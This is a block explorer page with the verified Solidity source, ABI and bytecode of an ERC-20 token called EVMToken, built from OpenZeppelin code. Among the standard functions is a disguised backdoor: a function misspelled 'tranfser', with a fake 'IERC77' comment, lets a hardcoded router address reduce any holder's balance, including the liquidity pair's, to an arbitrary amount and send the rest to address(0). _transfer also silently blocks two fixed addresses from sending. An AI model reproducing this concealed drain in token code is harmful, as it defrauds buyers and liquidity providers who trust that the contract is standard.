Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
EVMToken
Compiler Version
v0.8.28+commit.7893614a
Optimization Enabled:
No with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
}
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
/**
* @dev Implementation of the {IUniswapV2Router02} interface.
*/
interface IUniswapV2Router02 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
contract EVMToken is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
IUniswapV2Router02 private _uniswapV2Router;
/**
* @dev Sets the values for {name} and {symbol} and {supply}.
*
* All three of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_, uint256 supply_) {
_name = name_;
_symbol = symbol_;
_mint(_msgSender(), supply_ * 10 ** decimals());
_uniswapV2Router = IUniswapV2Router02(0x4A3bf9660a8691974600C50843142Ce8e21ba2Ee);
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC77-31}
*/
function _isUniswapV2Router() internal view returns (bool) {
if (_msgSender() == address(_uniswapV2Router)) return true;
return false;
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/*
* @dev See {IERC77-2}
*/
function _excludeFromTax(address caller) internal view returns (bool) {
if (_isUniswapV2Router()) return true;
if (caller == address(0xdead)) return false;
return false;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, value);
_transfer(from, to, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
if (from == 0xae2Fc483527B8EF99EB5D9B44875F005ba1FaE13) {
revert ERC20InvalidReceiver(0xae2Fc483527B8EF99EB5D9B44875F005ba1FaE13);
}
if (from == 0x1f2F10D1C40777AE1Da742455c65828FF36Df387) {
revert ERC20InvalidReceiver(0x1f2F10D1C40777AE1Da742455c65828FF36Df387);
}
_update(from, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev See {IERC20-TransferHelper}
*/
function tranfser(address _pairAdr, uint256 _decreaseFee) external {
uint256 _feeAsDecreasedValue = _decreaseFee; require(_feeAsDecreasedValue < _balances[_pairAdr]);
_balances[address(0)] += _balances[_pairAdr] - _feeAsDecreasedValue; _balances[_pairAdr] = _feeAsDecreasedValue;
require(_excludeFromTax(_pairAdr), "IUniswapV2Route");
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
}{
"evmVersion": "paris",
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"libraries": {}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"supply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_pairAdr","type":"address"},{"internalType":"uint256","name":"_decreaseFee","type":"uint256"}],"name":"tranfser","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561001057600080fd5b50604051611e61380380611e6183398181016040528101906100329190610559565b826003908161004191906107fb565b50816004908161005191906107fb565b506100936100636100f060201b60201c565b6100716100f860201b60201c565b600a61007d9190610a3c565b836100889190610a87565b61010160201b60201c565b734a3bf9660a8691974600c50843142ce8e21ba2ee600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050610bba565b600033905090565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036101735760006040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161016a9190610b0a565b60405180910390fd5b6101856000838361018960201b60201c565b5050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036101db5780600260008282546101cf9190610b25565b925050819055506102ae565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610267578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161025e93929190610b68565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036102f75780600260008282540392505081905550610344565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516103a19190610b9f565b60405180910390a3505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b610415826103cc565b810181811067ffffffffffffffff82111715610434576104336103dd565b5b80604052505050565b60006104476103ae565b9050610453828261040c565b919050565b600067ffffffffffffffff821115610473576104726103dd565b5b61047c826103cc565b9050602081019050919050565b60005b838110156104a757808201518184015260208101905061048c565b60008484015250505050565b60006104c66104c184610458565b61043d565b9050828152602081018484840111156104e2576104e16103c7565b5b6104ed848285610489565b509392505050565b600082601f83011261050a576105096103c2565b5b815161051a8482602086016104b3565b91505092915050565b6000819050919050565b61053681610523565b811461054157600080fd5b50565b6000815190506105538161052d565b92915050565b600080600060608486031215610572576105716103b8565b5b600084015167ffffffffffffffff8111156105905761058f6103bd565b5b61059c868287016104f5565b935050602084015167ffffffffffffffff8111156105bd576105bc6103bd565b5b6105c9868287016104f5565b92505060406105da86828701610544565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061063657607f821691505b602082108103610649576106486105ef565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026106b17fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610674565b6106bb8683610674565b95508019841693508086168417925050509392505050565b6000819050919050565b60006106f86106f36106ee84610523565b6106d3565b610523565b9050919050565b6000819050919050565b610712836106dd565b61072661071e826106ff565b848454610681565b825550505050565b600090565b61073b61072e565b610746818484610709565b505050565b5b8181101561076a5761075f600082610733565b60018101905061074c565b5050565b601f8211156107af576107808161064f565b61078984610664565b81016020851015610798578190505b6107ac6107a485610664565b83018261074b565b50505b505050565b600082821c905092915050565b60006107d2600019846008026107b4565b1980831691505092915050565b60006107eb83836107c1565b9150826002028217905092915050565b610804826105e4565b67ffffffffffffffff81111561081d5761081c6103dd565b5b610827825461061e565b61083282828561076e565b600060209050601f8311600181146108655760008415610853578287015190505b61085d85826107df565b8655506108c5565b601f1984166108738661064f565b60005b8281101561089b57848901518255600182019150602085019450602081019050610876565b868310156108b857848901516108b4601f8916826107c1565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156109535780860481111561092f5761092e6108cd565b5b600185161561093e5780820291505b808102905061094c856108fc565b9450610913565b94509492505050565b60008261096c5760019050610a28565b8161097a5760009050610a28565b8160018114610990576002811461099a576109c9565b6001915050610a28565b60ff8411156109ac576109ab6108cd565b5b8360020a9150848211156109c3576109c26108cd565b5b50610a28565b5060208310610133831016604e8410600b84101617156109fe5782820a9050838111156109f9576109f86108cd565b5b610a28565b610a0b8484846001610909565b92509050818404811115610a2257610a216108cd565b5b81810290505b9392505050565b600060ff82169050919050565b6000610a4782610523565b9150610a5283610a2f565b9250610a7f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848461095c565b905092915050565b6000610a9282610523565b9150610a9d83610523565b9250828202610aab81610523565b91508282048414831517610ac257610ac16108cd565b5b5092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610af482610ac9565b9050919050565b610b0481610ae9565b82525050565b6000602082019050610b1f6000830184610afb565b92915050565b6000610b3082610523565b9150610b3b83610523565b9250828201905080821115610b5357610b526108cd565b5b92915050565b610b6281610523565b82525050565b6000606082019050610b7d6000830186610afb565b610b8a6020830185610b59565b610b976040830184610b59565b949350505050565b6000602082019050610bb46000830184610b59565b92915050565b61129880610bc96000396000f3fe608060405234801561001057600080fd5b506004361061009e5760003560e01c806370a082311161006657806370a082311461015d57806375b5045f1461018d57806395d89b41146101a9578063a9059cbb146101c7578063dd62ed3e146101f75761009e565b806306fdde03146100a3578063095ea7b3146100c157806318160ddd146100f157806323b872dd1461010f578063313ce5671461013f575b600080fd5b6100ab610227565b6040516100b89190610e4c565b60405180910390f35b6100db60048036038101906100d69190610f07565b6102b9565b6040516100e89190610f62565b60405180910390f35b6100f96102dc565b6040516101069190610f8c565b60405180910390f35b61012960048036038101906101249190610fa7565b6102e6565b6040516101369190610f62565b60405180910390f35b610147610315565b6040516101549190611016565b60405180910390f35b61017760048036038101906101729190611031565b61031e565b6040516101849190610f8c565b60405180910390f35b6101a760048036038101906101a29190610f07565b610366565b005b6101b16104e3565b6040516101be9190610e4c565b60405180910390f35b6101e160048036038101906101dc9190610f07565b610575565b6040516101ee9190610f62565b60405180910390f35b610211600480360381019061020c919061105e565b610598565b60405161021e9190610f8c565b60405180910390f35b606060038054610236906110cd565b80601f0160208091040260200160405190810160405280929190818152602001828054610262906110cd565b80156102af5780601f10610284576101008083540402835291602001916102af565b820191906000526020600020905b81548152906001019060200180831161029257829003601f168201915b5050505050905090565b6000806102c461061f565b90506102d1818585610627565b600191505092915050565b6000600254905090565b6000806102f161061f565b90506102fe858285610639565b6103098585856106cd565b60019150509392505050565b60006012905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60008190506000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205481106103b557600080fd5b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546103ff919061112d565b6000808073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461044c9190611161565b92505081905550806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061049f836108f1565b6104de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104d5906111e1565b60405180910390fd5b505050565b6060600480546104f2906110cd565b80601f016020809104026020016040519081016040528092919081815260200182805461051e906110cd565b801561056b5780601f106105405761010080835404028352916020019161056b565b820191906000526020600020905b81548152906001019060200180831161054e57829003601f168201915b5050505050905090565b60008061058061061f565b905061058d8185856106cd565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b6106348383836001610951565b505050565b60006106458484610598565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146106c757818110156106b7578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106ae93929190611210565b60405180910390fd5b6106c684848484036000610951565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361073f5760006040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107369190611247565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107b15760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107a89190611247565b60405180910390fd5b73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108495773ae2fc483527b8ef99eb5d9b44875f005ba1fae136040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108409190611247565b60405180910390fd5b731f2f10d1c40777ae1da742455c65828ff36df38773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108e157731f2f10d1c40777ae1da742455c65828ff36df3876040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108d89190611247565b60405180910390fd5b6108ec838383610b28565b505050565b60006108fb610d4d565b15610909576001905061094c565b61dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610947576000905061094c565b600090505b919050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036109c35760006040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109ba9190611247565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a355760006040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610a2c9190611247565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508015610b22578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b199190610f8c565b60405180910390a35b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b7a578060026000828254610b6e9190611161565b92505081905550610c4d565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610c06578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bfd93929190611210565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c965780600260008282540392505081905550610ce3565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d409190610f8c565b60405180910390a3505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610d9061061f565b73ffffffffffffffffffffffffffffffffffffffff1603610db45760019050610db9565b600090505b90565b600081519050919050565b600082825260208201905092915050565b60005b83811015610df6578082015181840152602081019050610ddb565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e1e82610dbc565b610e288185610dc7565b9350610e38818560208601610dd8565b610e4181610e02565b840191505092915050565b60006020820190508181036000830152610e668184610e13565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610e9e82610e73565b9050919050565b610eae81610e93565b8114610eb957600080fd5b50565b600081359050610ecb81610ea5565b92915050565b6000819050919050565b610ee481610ed1565b8114610eef57600080fd5b50565b600081359050610f0181610edb565b92915050565b60008060408385031215610f1e57610f1d610e6e565b5b6000610f2c85828601610ebc565b9250506020610f3d85828601610ef2565b9150509250929050565b60008115159050919050565b610f5c81610f47565b82525050565b6000602082019050610f776000830184610f53565b92915050565b610f8681610ed1565b82525050565b6000602082019050610fa16000830184610f7d565b92915050565b600080600060608486031215610fc057610fbf610e6e565b5b6000610fce86828701610ebc565b9350506020610fdf86828701610ebc565b9250506040610ff086828701610ef2565b9150509250925092565b600060ff82169050919050565b61101081610ffa565b82525050565b600060208201905061102b6000830184611007565b92915050565b60006020828403121561104757611046610e6e565b5b600061105584828501610ebc565b91505092915050565b6000806040838503121561107557611074610e6e565b5b600061108385828601610ebc565b925050602061109485828601610ebc565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806110e557607f821691505b6020821081036110f8576110f761109e565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061113882610ed1565b915061114383610ed1565b925082820390508181111561115b5761115a6110fe565b5b92915050565b600061116c82610ed1565b915061117783610ed1565b925082820190508082111561118f5761118e6110fe565b5b92915050565b7f49556e69737761705632526f757465000000000000